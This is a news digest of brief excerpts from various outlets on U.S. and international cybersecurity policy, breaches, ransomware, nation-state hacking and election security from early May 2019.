The Hill
May 10, 2019
House
Democratic chairmen on Friday reintroduced a bill to protect U.S. election
systems against cyberattacks, including requiring President Trump to produce a
“national strategy for protecting democratic institutions.” The Election
Security Act is aimed at reducing risks posed by cyberattacks by foreign
entities or other actors against U.S. election systems. The national strategy
from President Trump would “protect against cyber attacks, influence
operations, disinformation campaigns, and other activities that could undermine
the security and integrity of United States democratic institutions.” The bill
is sponsored by House Homeland Security Committee Chairman Bennie Thompson
(D-Miss.), House Administration Committee Chairwoman Zoe Lofgren (D-Calif.) and
Rep. John Sarbanes (D-Md.), the chairman of the Democracy Reform Task Force.
The Hill
May 10, 2019
Lawmakers
on Friday introduced a resolution to require members and employees of the House
of Representatives to undergo annual cybersecurity and information technology
training. The Congressional Cybersecurity Training Resolution, sponsored by
Reps. Kathleen Rice (D-N.Y.) and John Katko (R-N.Y.), would require the chief
administrative officer of the House to carry out annual cyber and IT training
for House members, officers and employees. While House employees are already required
to undergo this training, Rice in a statement said that “it’s past time” House
members be “held to the same standard.” “Cyberattacks continue to pose a
growing and vexing threat at nearly every level of government and Congressional
Offices are no exception,” Rice said. “If we want to effectively counter those
threats, then we need to make sure Members of Congress are equipped with the
tools and knowledge to play an active role in this fight."
FCW
May 9, 2019
Lawmakers
and policy experts are demonstrating increased interest in open source
technology as a means to solving longstanding challenges and road blocks around
election security. State and local governments rely on proprietary software and
hardware from a small handful of private vendors to power their voting
machines, voter registration systems and other technologies. Those vendors have
historically been reluctant or unwilling to allow third-party audits of their
products, and when outside researchers have gotten their hands on voting
machines or probed commonly used software like voter registration systems,
they've found extensive and worrying cybersecurity vulnerabilities in nearly
every model. That reluctance has led to a number of projects that have sprouted
up over the past year from organizations aiming to disrupt the status quo. One
such organization, Voting Works, was created last year in partnership with the
non-profit Center for Democracy and Technology and seeks to build "secure,
usable, affordable and open-source voting machines" that will help to
restore trust in the modern election system.
The Hill
May 8, 2019
Sen. Angus
King (I-Maine) and Rep. Mike Gallagher (R-Wis.) announced Wednesday that they
will lead the newly established Cyberspace Solarium Commission (CSC), a group
of government and industry officials working to create a report on how to
defend the U.S. in cyberspace. The CSC, established by the 2019 National
Defense Authorization Act (NDAA), will hold “regular information-gathering
hearings” to review cyber threats, with the goal of creating a report that
includes “strategic recommendations” to prevent cyberattacks in a changing
global landscape, according to the chairmen. As stated in the 2019 NDAA, the
CSC has until Sept. 1 to send its report to Congress and multiple federal
agencies. King and Gallagher said the rollout of the report will also include
hearings to discuss the report’s findings involving congressional committees on
defense, intelligence and homeland security.
FCW
May 8, 2019
Congress
wants more cyber warriors, but they're hard to hold onto, according to Acting
Defense Secretary Patrick Shanahan. Testifying May 8 on the 2020 defense budget
before the Senate Appropriations Subcommittee on Defense, Shanahan said he's
happy to invest in more cyber scholarship programs, training ranges and red team
capabilities, but keeping cyber specialists onboard is the real challenge.
"Our biggest challenge with the red teams is keeping the people,"
Shanahan said, "We get out-recruited." Sen. Jerry Moran (R-Kan.)
suggested Shanahan and the Defense Department lean more on the National Guard,
which has members who often work for tech companies full-time and serve on the
weekends, to bolster cyber warrior capabilities.
Bloomberg
Law
May 7, 2019
Equifax
Inc. and other large credit reporting agencies would face mandatory penalties
for consumer data breaches under a bicameral Democratic bill. The agencies
could face fines of $100 for each person who had one piece of personal
information compromised, and an additional $50 for each additional piece of
information compromised, under the legislation by Democratic presidential contender
Elizabeth Warren (D-Mass.), Sen. Mark Warner (D-Va.), and Reps. Elijah Cummings
(D-Md.) and Raja Krishnamoorthi (D-Ill.). The bill comes as lawmakers
increasingly are focused on data privacy issues. Equifax would have had to pay
at least $1.5 billion in penalties for its 2017 data breach if the legislation
had been law then, the lawmakers said in a statement. The breach, revealed in
September 2017, exposed the personal information of more than 143 million
people. “Our bill would hold companies like Equifax accountable for failing to
protect consumer data, compensate consumers injured by these breaches, and help
ensure that these breaches never happen again,” Warren said in a May 7
statement.
Orlando
Sentinel
May 6, 2019
When U.S.
Sen. Bill Nelson was castigated by his Republican challenger, Gov. Rick Scott,
last year for saying Russian hackers had broken into Florida voting systems,
Nelson’s colleague, Marco Rubio, was aware of the breach. But Rubio couldn’t
defend Nelson because a spokesman for the senator said he wasn’t allowed to
divulge classified information. Rubio, R-Miami, declined to be interviewed for
this story. Nelson, D-Orlando, warned last year about successful hacking
attempts in 2016 but said he could not identify which county or counties had
been penetrated, saying the information was classified. No other senator backed
him up, and Scott and fellow Republicans attacked Nelson for what GOP campaign
emails called his “alarming claims” and “extremely reckless behavior.”
ADMINISTRATION
Gov Info
Security
May 10, 2019
The FBI and
the Department of Homeland Security have issued a joint warning about new
malware called "Electricfish." Investigators suspect it was developed
by the advanced persistent threat group Hidden Cobra, which has been linked to
North Korea. A warning released by the U.S. Computer Emergency Readiness Team
on Thursday does not indicate if any organizations have sustained an attack
from Hidden Cobra, also known as the Lazarus Group, using the Electricfish
malware. Because investigators were able to reverse-engineer some of the code,
however, there's a possibility it is operating in the wild and has been used in
some way by the group.
Nextgov
May 10, 2019
The vast
majority of the 2020 presidential candidates aren’t taking advantage of a basic
email security tool that could help prevent phishing attacks, industry
researchers found. Only three of the 24 declared candidates in the 2020
presidential race are fully enforcing Domain-based Message Authentication,
Reporting and Conformance, or DMARC, a security protocol that protects against
email spoofing, according to a blog post published Friday by the security firm
Valimail. By failing to use the tool, candidates could leave themselves
vulnerable to the types of phishing attacks that exposed thousands of the
Democratic National Committee’s internal emails during the 2016 election.
Fifth
Domain
U.S. Cyber
Command is reconsidering how it buys and develops the tools cyber warriors
need. The Joint Cyber Warfighting Architecture (JCWA), was established by Cyber
Command within the last year to guide capability development priorities. Cyber
is unique within the Department of Defense in that from an operational
perspective nearly all aspects are joint. This means in the traditional
warfighting realm, the services are responsible for manning, training and
equipping for a certain function, infantry or fighter pilots, for example.
While those forces are part of a theater-wide campaign plan beneath a combatant
command, they are still deployed under their own services. In cyber, by
contrast, the services don’t own any of the offensive cyber teams or
capabilities. While developed by the services, they are deployed by Cyber
Command in support of combatant commands through Joint Force Headquarters.
Nextgov
May 10, 2019
The number
of high-risk security incidents involving tax preparers and software jumped by
50 percent from 2017 to 2018, from 212 to 336. But, despite the growing number
of citizens filing taxes digitally and the rise in incidents, the IRS remains
largely powerless to police third-party providers, according to a watchdog
report. “Federal law and guidance require that the Internal Revenue Service
protect the confidentiality, integrity, and availability of the sensitive
financial and taxpayer information that resides on its systems,” a new
Government Accountability Office report states. “However, taxpayer information
held by third-party providers—such as paid tax return preparers and tax
preparation software providers—generally falls outside of these requirements,
according to IRS officials.” The scope of the problem is large, as last year,
90 percent of taxes were filed digitally through a third party—either a tax
accountant or online service. The agency has issued a list of 140 security
controls based off of standards set by the National Institute of Standards and
Technology. However, those controls are voluntary and currently only a third of
providers follow them.
FCW
May 9, 2019
The new
cyber workforce executive order looks to make it easier for employees to take
on cybersecurity roles within government, but agency IT officials point out the
measure has limitations. Shane Barney, chief information security officer of
the United States Citizenship and Immigration Services, said the order still
leaves the challenge of keeping employees in the building. "What I'm not
sure how much will get addressed with the executive order is, what about
retention?" he said at a May 9 event hosted by Government CIO. "Where
government is unbelievably good, is we can bring in fresh talent … then we'll
train them like there's no tomorrow" before they get hired by the private
sector. Barney said government use "some really great things" like
cyber pay and progressing up the general schedule as incentives for retaining
some employees, but he still sees employees, after the training and experience
provided by government, head out the door.
CyberScoop
May 9, 2019
The federal
Election Assistance Commission has appointed Jerome Lovato, a former Colorado
state election official, as head of the commission’s program for testing and
certifying voting systems, according to a commission email obtained by
CyberScoop. Lovato replaces Ryan Macias, who was filling the role in an acting
capacity and will step down this month. The crucial EAC program works with the
country’s top voting equipment vendors to certify and decertify voting system
hardware and software. Lovato’s appointment, which was first reported by
Politico, comes as the commission prepares to help secure the 2020 election, a
vote that U.S. officials have warned will be targeted by foreign adversaries.
Senators are expected to raise those issues next week at an EAC oversight
hearing next week.
Federal
News Network
Each of the
three military departments would be given the discretion to appoint a new
senior, Senate-confirmed official to handle information technology issues under
a legislative proposal the Pentagon is preparing to send to Capitol Hill. The
Army, Navy and Air Force have all signed onto the proposal, but its chief
proponent is the Department of the Navy. It is the successor to Navy officials’
earlier attempt to internally restructure their bureaucracy and designate a new
Assistant Secretary of the Navy for Information Management. The legislative
proposal differs from the previous effort in that it would let each of the
military departments add a fifth assistant secretary without doing away with
any of the others. But the basic idea is the same: the Navy believes it needs
an IT and data management official who is both at the most senior levels of its
organizational chart and who is focused on those issues full time.
The
Washington Post
May 7, 2019
In the wake
of a military cyberoperation that defense officials have credited with helping
safeguard last year’s midterm elections, the Pentagon’s Cyber Command is
hunting inside other countries’ networks for threats and to gain insights to
thwart foreign interference in the 2020 campaign, officials said. Code-named
Synthetic Theology, last year’s operation leveraged new authorities, granted by
the president and Congress, enabling U.S. agencies to become more aggressive in
foreign cyberspace in defense of the nation. Though the operation has ended,
Cybercom is continuing its close relationship with the National Security Agency
and working to build partnerships with other nations, other U.S. agencies and
American industry, senior Cybercom officials said Tuesday in their first
extensive public briefing on efforts to combat election interference and other
threats. “Our goal is to have no interference in our elections,” said Air Force
Maj. Gen. Tim Haugh, who heads the command’s cyber national mission force.
“We’re going to support [the Department of Homeland Security ] and FBI in the
missions they’ve been assigned. But ideally, no foreign actor is going to
target our electoral process.”
FCW
What if
clicking an email phishing link could get you fired? Cyber hygiene is such a
problem for the Navy that the service is considering sanctions for personnel
who lack basic cyber hygiene. "One of the biggest problems we have quite
frankly is one of the least costly to address, which is just hygiene. And
that's an education campaign to make sure our people understand how critical
cybersecurity is," the Navy's number two, Thomas Modly, told reporters
following his keynote address at the Sea Air Space conference in National
Harbor. Modly stressed that something drastic was needed to highlight cyber
hygiene importance. Noting that some private companies employ internal phishing
campaigns and if an employee can be terminated if they take the bait a certain
number of times, Modly said the Navy is looking at punitive measures for users
to get them to take cybersecurity seriously.
The
Baltimore Sun
Baltimore
city government computers were infected with ransomware Tuesday, the mayor’s
office said, the second time in just over a year that hackers demanding payment
disrupted the city’s technology systems. “Employees are working diligently to
locate the source and extent of the infection,” said Lester Davis, a spokesman
for Democratic Mayor Bernard C. “Jack” Young. Davis said critical systems,
including 911 and 311, were not been affected, but that the majority of city servers
were shut down. The effects ranged from a City Council committee canceling a
hearing on gun violence to water customers being unable to get billing
questions answered. By the afternoon, Davis said, city teams had the ransomware
quarantined. But the cause and scale of the problem was not clear Tuesday
evening and Davis did not know when the affected systems would be back online.
INDUSTRY
Reuters
May 10, 2019
Symantec
Corp faces an uphill battle to turn around its business and win investor
confidence, analysts said on Friday, after Chief Executive Officer Greg Clark
became the fifth top executive in six months to leave the cybersecurity
company. Clark's shock departure on Thursday came along with a gloomy set of
quarterly results that fell short of expectations on revenue and a warning on
profit, triggering a 15 percent slump in the company's shares and erasing more
than $2 billion in market cap. At least six brokerages cut their price targets
on the stock, which is on track to give up most of its gains this year.
"Investors were desperately hoping to see some stabilization for the
current quarter, but what they got instead was a number of negative surprises
in the form the company's CEO heading out and its struggles to grow
sales," Investing.com analyst Haris Anwar said.
Gov Info
Security
May 9, 2019
Accounting
software giant Wolters Kluwer says it's continuing to attempt to recover from a
malware attack that disrupted services for users of its cloud-based services.
While some online chatter has suggested that ransomware may have been involved,
the company has yet to publicly name the strain of malware involved. Wolters
Kluwer is a $4.8 billion global information services company based in the
Netherlands that develops CCH, a suite of tax and accounting software that's
available in both on-premises and software-as-a-service form. "Our
customers include 90 percent of U.S. academic medical centers, 93 percent of
Fortune 500 companies, 100 percent of the top U.S. accounting firms and 90
percent of the world's top banks," according to the company's 2018 annual
report. On Monday, customers of the company's cloud-based products began
reporting that they were unable to access CCH software and services, that the
company's support site was also unreachable and that the company's customer
representatives didn't know what was happening.
The Wall
Street Journal
May 9, 2019
As
companies struggle to fill hundreds of thousands of open cybersecurity jobs
around the U.S. they are casting a wider net to find and develop experts,
pursuing workers without traditional four-year degrees or formal experience to
help them protect computer networks and customer data. Facing a shortage of
skilled workers to defend against digital attackers, employers like
International Business Machines Corp. and Palo Alto Networks Inc. are pouring
millions of dollars into new partnerships with universities and training
programs.
Nextgov
May 8, 2019
International
spies are hammering government networks harder than ever, according to the
latest Verizon Data Breach Investigations Report released Wednesday. The 2019
report shows a 168 percent increase year-over-year in the number of government
network breaches linked directly to state-sponsored actors. The growth
solidifies cyber espionage atop the list of threats to the public sector for
the second year in a row. “Cyber-espionage is rampant in the public sector,
with state-affiliated actors accounting for 79 percent of all breaches
involving external actors,” Verizon analysts wrote in the report. “Privilege
misuse and error by insiders account for 30 percent of breaches.” The public
sector had 23,399 reported incidents in 2019, with 330 confirmed instances of
data being disclosed through a breach. While crimeware (4,758 incidents) and
lost or stolen assets (2,820) outpaced other reported incidents, the misuse of
privileged credentials topped the list with more than 13,000 incidents.
CyberScoop
May 8, 2019
hieves have
stolen more than $40 million worth of bitcoin from Binance, one of the world’s
largest cryptocurrency exchanges, as part of a “large scale” security incident
affecting roughly 2 percent of its bitcoin holdings, the company announced
Tuesday. Hackers stole two-factor authentication keys, API data, and
“potentially other info” through an attack that combined phishing and viruses,
Binance said in a May 7 statement. The result was the withdrawal of 7,000
bitcoin, worth nearly $41 million at the time of the heist, from Binance’s “hot
wallet” when the time was right. No user funds were affected by the breach.
Ars Technica
May 8, 2019
More than
100 e-commerce sites around the world are infected with malicious code designed
to surreptitiously skim payment card data from visitors after they make
purchases, researchers reported on Wednesday. Among those infected are US-based
websites that sell dental equipment, baby merchandise, and mountain bikes. In
total, researchers with China-based Netlab 360 found 105 websites that executed
card-skimming JavaScript hosted on the malicious domain
magento-analytics[.]com. While the domain returns a 403 error to browsers that
try to visit it, a host of magento-analytics[.]com URLs host code that’s
designed to extract the name, number, expiration date, and CVV of payment cards
that are used to make purchases. The e-commerce sites are infected when the attackers
add links that cause the malicious JavaScript to be executed.
Gov Info
Security
May 8, 2019
A
sophisticated nation-state spy network has quietly exploited a backdoor in
Microsoft Exchange servers that gave attackers unprecedented access to the
emails of at least three targets over five years, security firm ESET warns.
Since at least 2014, Turla, an advanced persistent threat group with suspected
ties to the Russian government, has exploited malware called LightNeuron to
gain access to Exchange servers, according to the ESET report released Tueday.
This backdoor allowed the spies to read, modify or block any emails passing
through the targeted mail servers, ESET says. The attackers also had the
ability to compose new emails and send them under the names of legitimate
users, the research shows. The targets of the attack included a ministry of
foreign affairs in an Eastern European country, a regional diplomatic
organization in the Middle East and an unknown Brazilian organization, ESET
says.
The
Financial Times
May 7, 2019
Orange has
made its biggest move into the cyber security market after acquiring Belgian
technology company SecureLink in a deal that values the company at €515m
including debt. SecureLink, based near Antwerp, is owned by Investcorp and its
management and operates in eight European countries. It had €248m of revenue in
2018. It issued a convertible bond on the Oslo stock exchange in February to
raise €150m. It is Orange’s largest acquisition since it acquired some Airtel
assets in west Africa in 2016 and the second significant cyber security
acquisition that Orange has made this year. It acquired UK security company
SecureData in February for an undisclosed sum. The French company has identified
cyber security and banking as new growth areas for its traditional telecoms
business. BT has also targeted security as a growth area within its Global
Services division and employs 2,600 workers across the world.
AP
May 6, 2019
Microsoft
announced an ambitious effort it says will make voting secure, verifiable and
more transparent with open-source software. Two of the three top U.S elections
vendors have expressed interest in potentially incorporating the software into
their voting systems. The software kit is being developed with Galois, an
Oregon-based company separately creating a secure voting system prototype under
contract with the Pentagon's advanced research agency, DARPA. Dubbed
"ElectionGuard," the Microsoft kit will be available this summer, the
company says, with early prototypes ready to pilot for next year's general
elections. CEO Satya Nadella announced the initiative Monday at a developer's
conference in Seattle. Nadella said the program's software would help
"modernize all of the election infrastructure everywhere in the world."
INTERNATIONAL
Wired
May 10, 2019
The hack of
health insurance giant Anthem Inc. has loomed large in the public consciousness
since it first came to light in 2015—not just as one of the biggest breaches of
all time, but also as a potential example of the Chinese government's
longstanding cyber espionage campaign. Hackers stole names, birth dates,
addresses, Social Security numbers, and employment details from 78 million
Anthem customers. And for years China was reported to be behind it. But when
the Department of Justice unsealed an indictment Thursday evening charging two
Chinese nationals for the Anthem attack, any indication of the alleged hackers'
motives or affiliation was noticeably absent. The US government accused
32-year-old Fujie Wang and an unnamed codefendant of being “members of a
hacking group operating in China” who “used extremely sophisticated techniques
to hack into the computer networks of the Victims.” In addition to Anthem, the
indictment alleges they were responsible for three other large corporate
intrusions, against a basic materials company, a communications firm, and a
tech company. But it does not go on to characterize their motivations or goals.
Reuters
May 10, 2019
Leading
Western industrial powers will for the first time jointly simulate a major
cross-border cyber security attack on the financial sector next month, French
officials said on Friday. The exercise, organized by the French central bank
under France's presidency of the Group of Seven nations (G7), will be based on
the scenario of a technical component widely used in the financial sector
becoming infected with malware, said Nathalie Aufauvre, the Bank of France's
director general for financial stability. Institutions such as the European
Central Bank and the Bank of England have already conducted such tests, but the
June exercise will be the first across borders at the G7 level, Aufauvre told a
cyber security conference at the bank. "Cyber threats are proof that we
need more multilateralism and more cooperation between our countries,"
French Finance Minister Bruno Le Maire told the conference.
Vice
Motherboard
May 8, 2019
Leading
cryptographic experts believe a Russia-designed algorithm pitched to an
international standards body contains a flaw that could potentially undermine
the security of encrypted data. The Russian delegation who designed the
algorithm say the flaw is a coincidence, but multiple people deciding whether
the algorithm should become a standard aren't convinced. The algorithm was
discussed at a meeting in Tel Aviv in April, a working group of the
International Organization for Standardization (ISO), an organization which
approves or denies countries hoping to cement their cryptographic algorithms as
standards. At the meeting, Russian officials weren’t very happy, according to
Dr. Tomer Ashur, a researcher with KU Leuven University who represented the
Belgian delegation. Before approving the algorithm, ISO experts said they
wanted to wait six more months to better understand the security implications
of a newly discovered issue in the algorithm. The delay is occurring because,
in January, researcher Léo Perrin published a paper about two Russian
algorithms, including the one under consideration, that shared a component
called an “S-Box” in cryptography. Perrin is affiliated with Inria, the French
national institute for the digital sciences.
The New York Times
May 6, 2019
Chinese
intelligence agents acquired National Security Agency hacking tools and
repurposed them in 2016 to attack American allies and private companies in
Europe and Asia, a leading cybersecurity firm has discovered. The episode is
the latest evidence that the United States has lost control of key parts of its
cybersecurity arsenal. Based on the timing of the attacks and clues in the
computer code, researchers with the firm Symantec believe the Chinese did not
steal the code but captured it from an N.S.A. attack on their own computers —
like a gunslinger who grabs an enemy’s rifle and starts blasting away. The
Chinese action shows how proliferating cyberconflict is creating a digital wild
West with few rules or certainties, and how difficult it is for the United
States to keep track of the malware it uses to break into foreign networks and
attack adversaries’ infrastructure.
CyberScoop
May 6, 2019
Israel’s military announced Sunday it had launched airstrikes on a
building allegedly housing a number of Hamas soldiers that were preparing to
launch a cyberattack against Israel. Israel Defense Forces (IDF), which
launched the airstrike jointly with the Israel Security Authority, did not
detail the alleged cyberattack and other offensive capabilities Hamas was
developing, but said it had neutralized the attack before launching the
airstrikes. The incident marks the first time a government has publicly
announced it has immediately responded to a cyberattack by launching a “kinetic
attack,” a military term that describes the use of lethal force. Although this
marks a first in cyberwarfare, Paul Rosenzweig, a former deputy assistant
secretary for policy at the U.S. Department of Homeland Security, tells CyberScoop
it’s not a surprising outcome.
TECHNOLOGY
CyberScoop
May 10, 2019
Whoever came
up with “thieves rob banks because that’s where all the money is” needs to add
“digital advertising” to the updated version of the adage. Criminals simply
don’t need to go through all the trouble of stealing money from well-fortified
financial institutions when they can just trick advertisers into directly
lining their pockets. With internet ad revenue totaling more than $100 billion
in 2018, scammers are following that line of money: ad fraud is set to cost the
industry as much as $44 billion annually by 2022. Online ad fraud has become so
profitable that malware creators and botnet masters are developing new programs
and theft techniques in order to keep making a profit, according to Michael
Tiffany, president and co-founder of the bot detection company White Ops.
Ars Technica
May 9, 2019
Websites
running the Drupal, Joomla, or Typo3 content-management systems are vulnerable
to attacks that could possibly execute malicious code until administrators
install just-released patches, developers and security researchers warned. The
vulnerability resides in the PharStreamWrapper, a PHP component developed and
open-sourced by CMS maker Typo3. Indexed as CVE-2019-11831, the flaw stems from
a path-traversal bug that allows hackers to swap a site's legitimate phar
archive with a malicious one. A phar archive is used to distribute a complete
PHP application or library in a single file, in much the way a Java archive
file bundles many Java files into a single file.
via Nick
Leiserson
